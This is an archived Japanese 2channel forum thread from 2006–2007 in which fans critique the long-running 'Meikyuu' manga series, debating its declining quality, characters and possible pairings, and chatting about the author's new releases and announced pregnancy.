dgdg設定は驚く

139 :花と名無しさん:2006/11/07(火) 23:42:45 ID:???O
いやあ、今更何やられても多分もう驚きは無いな。
あるとしたら脱力…とか。

まあ、自分はもう結構前に脱落したけども。

140 :花と名無しさん:2006/11/08(水) 14:08:56 ID:???0
>138はgdgdじゃないのか?と突っ込みたかったんじゃないかな。
gdgd設定にはまぁ、もうおどろかんだろうが。

141 :花と名無しさん:2006/11/12(日) 04:16:46 ID:LQ5ND2uw0

[z
z
z
z
z
z]

142 :花と名無しさん:2006/11/12(日) 10:50:25 ID:???O
綿密な物語とトリックを組みあげる知性がすごいし、
人間が描ける人は貴重だよ。
最近は別花にも安直で浅い作品があるのがとても残念。
こういう時ほど、良質で真に実力ある人が頼りなのでがんばってほしいよ。

143 :花と名無しさん:2006/11/12(日) 15:18:44 ID:???O
誤爆かと思った。

144 :花と名無しさん:2006/11/12(日) 17:50:21 ID:???0
>142

誤爆じゃないの?
>最近は別花にも安直で浅い作品があるのがとても残念。
これに今の神谷作品はあてはまると思うけどね
昔から色んなところからインスパイヤしまくって、自分でイチから作れないんだと思う。
イチからやろうとして受けなくて、しばらく干されてたっていうか描けない時期あったし







145 :花と名無しさん:2006/11/12(日) 18:11:49 ID:???0
>>143-144
別花スレにいつも現れる擁護チャソだよ。
携帯使いで4〜5行ぐらいで文面がよく似てるから。
神谷さんと波平が好きみたいなんだお……つまり誤爆ではなくマジw

146 :花と名無しさん:2006/11/12(日) 19:19:32 ID:???0
> 綿密な物語とトリック

ワロタww
こんなの話が今よりマシな初期からなかったよ
本人なんじゃないの、擁護w

147 :花と名無しさん:2006/11/12(日) 21:47:44 ID:???O
別花はミステリーっぽい作品がいくつかあったよね。
ほかのにくらべたら実際どう?
トリックが自前なだけで某有名推理まんがより上だけどさ

148 :花と名無しさん:2006/11/16(木) 23:41:50 ID:???0
ミステリとしてのトリック云々よりも、それにかかわる人間の話、
として好きなシリーズだったんだけどね。
足が不自由だった頃のこのみ先輩のプライドとか。
結城設定のつじつま合わせ(無理がみえみえ)や、
付加価値つけすぎの京に嫌気が差してしまった。


149 :花と名無しさん:2006/11/17(金) 23:04:03 ID:???0
トリックなんて正直他のシリーズの方がよっぽど面白かった
この人のは>148みたいにそれに絡む京と山田の成長物語っていうか人間模様
がメインだと思ってたし。
ただ、段々作者が自分に酔ってきた臭がぷんぷんしてきた気がするよ
私ってこういう良いことしてるの!だからこうするべきなの!
っていうのが作品に反映してきてキャラが偽善者みたいにみえて読む気なくなった


150 :花と名無しさん:2006/11/20(月) 07:57:37 ID:Y5l5iAgUO
文庫早く出ないかな

151 :花と名無しさん:2006/11/20(月) 08:23:08 ID:???O
>>ID:Y5l5iAgUO
通学or通勤途中か?
エムラ、イチハ、ビワタリと白癬系スレがまとめてageられてるから、
なんかあったのかと思ったよ…

152 :花と名無しさん:2006/11/20(月) 09:25:05 ID:???0
ミステリとしては、あーこのひと新本格の小説よく読んでるんだろうなと
思ったくらい。最初の出発点は島田だろうし。
少女漫画ならではの人物描写やストーリー構成をうまくあわせてかけてたと
思うよけどね、途中までは。

みんなどのへんから微妙に思うようになったんだろう。
個人的にはもともと厨くさいところはあったものの人形占い?
大切なものを失うかも云々のあたりかな。あれでそろそろ京も人として
なんとかなってきたから終わると思ってたのにgdgd続いて迷走した感じ。
このころからアキラの正義厨っぷりも微妙に思えてきた。

153 :花と名無しさん:2006/11/20(月) 16:44:39 ID:???O
自分の場合は単に、あんまりだらだらだらだら続くからか、
いつの間にか惰性で買うようになり、その内新刊出ても買わなくなり…て感じ。
完全に自然消滅。
昔は本当に好きだったのに。

最後に買ったのは29巻くらいかな。
どうでも良くなった「決定的な理由」みたいなのは無かったと思う。
しかしそれにしても何だかんだで良く粘ったものだと自分では思う。

で、その後の酷さをここで知って(時期としては前スレ)、
ああ止めといて良かったと、そりゃあもう心の底から安堵致しましたよ。

つうか、本当にいつまで続けるんだかな…今更だけど。

154 :花と名無しさん:2006/11/20(月) 19:51:46 ID:???0
買うのやめたのはわりと最近だけど、ダメぽと思い始めたのは結構前だなあ。
はっきりとは覚えてないが。

アキラの正義厨くささが鼻についてしょうがなくなったのは
結城の妹のレイプ事件の辺りだったのは鮮明に覚えてる、
子供がレイプ被害者に偉そうに説教か、めでてーなと心底ムカついた。
そんな話を(というかキャラを?)描く神谷氏にも不快感を覚えたね。

京属性の左京の出現とかもいかにもーで、
これ絶対イメージボイス増谷とか思ってんだろうなとか
何かその辺りの公式同人っぽいのでドン引き、
山田結婚→子供溺愛&京とのカップリングで決別した。

でも気になって情報見てしまう辺り、好きだったんだよなあ…
本当、とっとと終わらせてくださいよ、京と山田娘の結婚とか描かないでくれよマジで。
元ファンからの心からのお願いだ。

155 :花と名無しさん:2006/11/20(月) 20:42:09 ID:???0
増谷って誰?

156 :花と名無しさん:2006/11/23(木) 01:02:44 ID:???0
>>155
確か声優の増谷康紀氏

157 :花と名無しさん:2006/11/23(木) 11:18:15 ID:???O
これだけ巻数重ねてますので、叩くのも結構だけど
有名漫画家で有名ミステリーの作者であることはみとめましょうよ。
トリックの凄さや医療分野のリアル設定は青年誌クラスですけど。

158 :花と名無しさん:2006/11/23(木) 11:44:43 ID:???0
京&一平シリーズは正直飽きたが、作者のアンチになったわけではないので
こうあからさまに信者を装った下手な擁護もどきを見ると腹が立つ。

159 :花と名無しさん:2006/11/23(木) 11:51:42 ID:???O
いつもの人かと思ってたよ。煽りもどき?
保守にもなるから、放置してれば?

160 :花と名無しさん:2006/11/23(木) 20:31:47 ID:???0
煽りだか信者だか知らんが、
トリックの凄さって、お前新本格でもいいから
推理小説読んでこいって感じw

アンチになったつもりはないが、さすがに笑っちゃうw

161 :花と名無しさん:2006/11/26(日) 00:43:33 ID:???0
次号予告より:「別冊花とゆめ2月号」12/26(火)発売に
『おわんぽ(ハート)』 待望の新作よみきり!!カラー46P
みちるの乗りうつり(?)ハプニング
神社の娘・みちるは、大事にしているぬいぐるみに
憑依してしまった…!?
--------------------------
だそうです。予告カットのヒロインはとりあえず可愛かった。

162 :花と名無しさん:2006/11/30(木) 14:03:08 ID:Ns9TNaLS0
京シリーズは好きだから、出来れば末永く見たい。
ただし、山田が結婚する前の話限定で。
その頃の設定に戻れば、また以前の様なクオリティの高さや
あのワクワク感や切なさが戻って来る気がする。
という希望願望を言ってみる。

163 :花と名無しさん:2006/11/30(木) 17:23:06 ID:???0
迷宮シリーズ=京シリーズなのか…(´・ω・`)
自分は京と山田のバランスが良かった頃まで戻ってほしい…。
作者の京贔屓が目立ってきてから、gdgdになったように感じるので。

164 :花と名無しさん:2006/11/30(木) 18:24:10 ID:???O
文庫3巻までと占いの巻だけ読んでまだおもしろいと感じてるんだけど回を増したら劣化していくのか…残念だお
そして未だ続いてることに衝撃だ

占いの巻を読んで最終話は山田の大事な親友の京が死んで残った山田は悲しんだ末決意新たに寿命を全うしてFin
「長い間のご愛読ありがとうございました。神谷先生の次回作にご期待下さい」で終わりだと思っていた

まだ初期しか読んでないから疑問なんだが何故このスレで山田の娘と京のカップリングフラグが立ってるんだ?山田の子供って事は最低25歳以上の年の差があるだろうに

>>163
贔屓キャラはアキラだとばかり…

165 :花と名無しさん:2006/11/30(木) 18:57:31 ID:???0
>>164
アキラね・・・。
最初の読みきりだけで終わっときゃ良かったのに。
今となっては大っ嫌いなキャラになってしまった。

166 :花と名無しさん:2006/11/30(木) 19:36:30 ID:???0
>>164
アキラは迷宮シリーズにも出てくるけど、一応別シリーズの主役なので…。
しかもアキラ、作者の趣味全開の終わりで、>165に禿同意。
漫喫かブコフにコミクスけっこう並んでいるので、読んでみればわかるけど
カップリングフラグが立つようなエピがあったんだよ。
たぶん最新コミクスに収録されている。

改めてs-bookで既刊コミクス眺めてみたんだが、迷宮って
もう15年近くもやってんだな。長期連載が多い花ゆめ系の作品の中で、
長期であるのが1番目立ってない希ガス。
絶版になっていないコミクスが多い点は、褒めるべきなんだろうか。

167 :花と名無しさん:2006/11/30(木) 20:35:06 ID:???O
>>166
d!
読んでみるわ

何巻まで出てるのかよう知らんのだが最新刊て黒迷宮?で良かったのかな

168 :花と名無しさん:2006/11/30(木) 20:55:01 ID:???0
>>167
Amazonで検索、または白泉社公式サイトで検索できる。
(Amazonでは発売日が新しい・早いを選択)

169 :花と名無しさん:2006/12/01(金) 12:10:31 ID:???O
塚推理ものってストーリー破綻しようが無理矢理な後付けしようが終わらないよなぁ…

某蝶ネクタイのガキの漫画も10数年以上サザエさん現象で一向に終わる気配はないし

見切りがつきかけたのはアキラの作者のオナペット化を感じてからだが作者と作品自体は好きな方なのでこのまま読み続けそうだ

しかしこれ以上の読者置いてけぼり後付け設定だけは勘弁して下さい

170 :花と名無しさん:2006/12/01(金) 15:48:00 ID:???0
>>169
あっちは、やめられないのもあるでしょ。稼ぎ頭だしさ。
迷走はしてると思うが、さすがに迷宮シリーズと比べるのはどうよ…

このシリーズの違和感って、同じ空間にいる山田と京が
着々と年を取ってるのに、アキラだけ一人サザエさんなのもあるなー。
そしてその子供の言葉に皆がマンセー。気持ち悪いんだよなあ…

171 :花と名無しさん:2006/12/02(土) 14:18:42 ID:???O
>>168
本日コミクス最新刊2冊を読んだがやはり恵理さんはともかく山田娘とのカップリングエピは分からんかった
なので仮にフラグが立つなら京と恵理さんかとオモタ

そして思い出したかのように突然出てくる人形と月子にビビったよ

しかしこの作者は石迷宮辺りから今日に至るまで殆ど絵が変わってないのが誉めるべき点かもしれない

172 :花と名無しさん:2006/12/02(土) 15:43:57 ID:???0
>171
> 山田娘とのカップリングエピは分からんかった

雑誌しか買っていないので、コミクスに収録されているかどうか解らないんですが、
山田娘が心肺停止で蘇生処置をしている場面で、
京が「僕が一生面倒を見る」→山田娘が生き返るというエピが有ったんですよ〜
その前から散々、山田とこのみが夫婦で娘を京に押しつけていたから、
フラグが立ったように思えるわけで。

173 :花と名無しさん:2006/12/02(土) 16:30:21 ID:???O
>>172
(Д)。゜あのエピのことか!ありがとう

いや…深い意味がないと次巻で即フォローがあったんで別段他意はないと思っていた

神谷さん年の差カプに萌えそうなタイプじゃあなさそうだしやっぱりないとオモ。でもフラグ関係なく迷宮のおにゃのこは最初穏やかでも突如鬼の形相で発狂するのが多かったから山田の女の子バージョンみたいなみどりはかわいかった

最終的独身でこのまま京は我が人生に一片の悔いなし!とかで終わりそう

今休載中なんだよね

174 :花と名無しさん:2006/12/03(日) 14:13:54 ID:???0
>>173
わからんぞ。昔の神谷さんならいざしらず、
子供マンセーになってからの神谷さんは、斜め下の展開が多い。
でも独身で通してくれるなら、それにこした事はないな…

どうでもいいけど、適宜改行してくれるとありがたい。

175 :花と名無しさん:2006/12/03(日) 15:00:10 ID:???O
>>174
たしかに読みづらいな
スマソ…orz

子供マンセーか?
美形マンセーではあるが

でもそんな犯罪チックなカプ描かないさ

多分独身エンドだよ⊃旦

しかし女キャラが皆京マンセーなのは最近違和感…

176 :花と名無しさん:2006/12/03(日) 20:53:39 ID:???O
>>173
休載なんだー?と思ってすごく久しぶりに神谷さんのブログ見に行ったら理由がわかった。

これを期にゆっくり休んでいい作品を書いてくれないかなぁ

177 :花と名無しさん:2006/12/05(火) 01:38:47 ID:???0
>>175
女キャラが京マンセーなのは、最初からだから別に違和感ない。
つーか、それが未だに楽しみだったりするw
が、違和感を感じるのも分かる気がする。
当時は、誰からも愛されてないと思い込んでる京だったせいもあるし、
親戚一同をはじめ、誰も京を理解してなかったせいもあって、
孤独を感じてる京が、実は愛されてるという描写が少しでもあると
とてつもなく嬉しかった。
今は誰が見ても周りから愛されまくってる京だから、少々物足りないってのはある。

178 :花と名無しさん:2006/12/07(木) 10:34:05 ID:???0
子供マンセーっつか、アキラマンセーだあね。


179 :花と名無しさん:2006/12/10(日) 06:29:14 ID:???O
アキラがウザくてイヤ。
結城とくっつく前も後も…幼年期の話からずっとイヤ。

180 :花と名無しさん:2006/12/10(日) 10:26:22 ID:???O
来年かさ来年の今頃は、待望の自分の子供を前にして
子育て日記的漫画を描いていそうだと、blogを見てオモた。
普段は神谷さんのblogなんて一切見ないんだが、
体調がどうこう言うレスを別花スレで見かけて、妊婦になった事を知ったよ。

181 :花と名無しさん:2006/12/11(月) 14:15:54 ID:???O
>>179
アキラは最終兵器が作者自身の彼への萌えだから。
読む度破壊力が増してきつかったな


>>180
しっかりした良い子育てしそうだな

182 :花と名無しさん:2006/12/11(月) 18:12:22 ID:???0
神谷さんが望んでいたことが無事に達成できますように。


でもこの経験を生かして漫画を描くなら、別花でないところを希望します。
シルキーとか。
迷宮にこれ以上子供は要らないよ…

183 :花と名無しさん:2006/12/11(月) 21:09:45 ID:???0
名前でググってもブログ出てこないんだな

184 :花と名無しさん:2006/12/11(月) 22:19:05 ID:???0
>>181
ええ、そうか?
アキラ見るだに、この人大丈夫か?と思うんだけど…
まあ何にせよめでたいので、この期間にゆっくり休んでいい作品を描いて欲しいものだ。
いや子育て漫画ってことではなくねw

>>183
出ないんだよねw
前はそれでもリンクが辿れたんだが、見失ってしまった。


185 :花と名無しさん:2006/12/11(月) 22:21:58 ID:???0
つ【ポキタ】

186 :花と名無しさん:2006/12/11(月) 23:21:40 ID:???0
公式サイトのリンクから普通に行けるのでは…

187 :花と名無しさん:2006/12/11(月) 23:59:14 ID:???0
>>185
ォくす。見てきた。
人の萌え漫画に文句つけてる暇があったら(略

>>186
もありがとう。
公式リンクされてんのか。知らんかった。
いつも検索で行ってたw


188 :花と名無しさん:2006/12/12(火) 00:55:53 ID:???O
もし子供が同性愛者になっても、たじろがずお育てになるんでしょうな…
つか、迷宮シリーズやエッセイ漫画見てると、
「差別化しない事による差別」が強調され過ぎてる感じがして鼻につく。
殊更に「差別はいけない!」と言い過ぎてて、なーんかね…

189 :花と名無しさん:2006/12/12(火) 07:03:42 ID:???0
>>179
同じく。
アキラのあのキャラ、迷宮シリーズには絡んで欲しくなかった。
絡み出してから個人的に迷宮シリーズもつまらなくなった。

190 :花と名無しさん:2006/12/12(火) 08:44:20 ID:???0
>>188
わかる。言ってる事はそうそう悪くないのかもしれないけど、
そんな主張が読みたいわけじゃないんだけどなー、みたいな。
そんな事を声高に主張したいなら、啓蒙漫画でも描けばいいのに。


191 :花と名無しさん:2006/12/22(金) 13:42:04 ID:???O
話豚切るが…
神谷さんてベテランだし、もう40代だよね?
高齢出産になるから、特に身体には注意してガンガレよ〜。

192 :花と名無しさん:2006/12/22(金) 13:53:11 ID:???0
40代か?30代じゃないか?
ギリギリかもしれないが…いや知らんので間違ってたらスマン。
まあ高齢出産には間違いないだろうが。


193 :花と名無しさん:2006/12/22(金) 20:37:48 ID:???0
1984年デビューなので、デビュー時高校卒業後なら40代?

194 :花と名無しさん:2006/12/23(土) 05:04:25 ID:???0
高校生デビューの人も多いのでデビュー時16、17ならギリギリ30代か。

195 :花と名無しさん:2006/12/23(土) 06:08:16 ID:???0
高校生デビューだったと思うが
年齢までは知らないなあ

196 :花と名無しさん:2006/12/23(土) 10:53:18 ID:???0
ブログに「若手作家が集まる時、18歳ぐらいに参加して」ってあったから
17歳、18歳ぐらいでデビューなのかな?

出産は本当に今まで辛くて大変だったとブログから察するし、努力もして
今回に繋がったと思うので、同じ女性として無事に出産を祈ってますよ。
私も婦人科通院が長いので余計に思った。

197 :花と名無しさん:2006/12/23(土) 20:42:12 ID:???0
日記に「30代なら体脂肪率は〜」って書いてあったから、多分30代じゃね?

198 :花と名無しさん:2007/01/03(水) 16:09:29 ID:???0
確か昭和42年生まれだったかと。
とすると39歳かな。

199 :花と名無しさん:2007/01/16(火) 07:22:10 ID:???0
ttp://www.s-book.com/plsql/com2_detail?isbn=9784592178590
2月の新刊情報 「童迷宮−消えた青い鳥−(ドウメイキュウ)」
■ISBNコード: 9784592178590■発売日: 2007/02/19
概要:京と一平が、Wブッキングのため同居することになった大学入学当時の話。
頑張って働く母に、幸せの青い鳥の折り紙をプレゼントすると言っていた少女が行方不明に!?
『迷宮・消えた青い鳥』、『麗しの綾小路京さま』、『迷宮・正義のぱんだマン』、『迷宮・踊る座敷童子』を収録。


最近は神谷さんのコミックスを買う気力が出ないが、まとまて読んだら連載とは違った
感想が出るだろうか…(´・ω・`)

200 :花と名無しさん:2007/01/18(木) 06:25:03 ID:gIyrSzdp0
既出

201 :花と名無しさん:2007/01/18(木) 10:07:11 ID:???O
>>199
タイトル見ても話が思い出せなくなってきたorz
脳細胞が死んでいってるな…

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)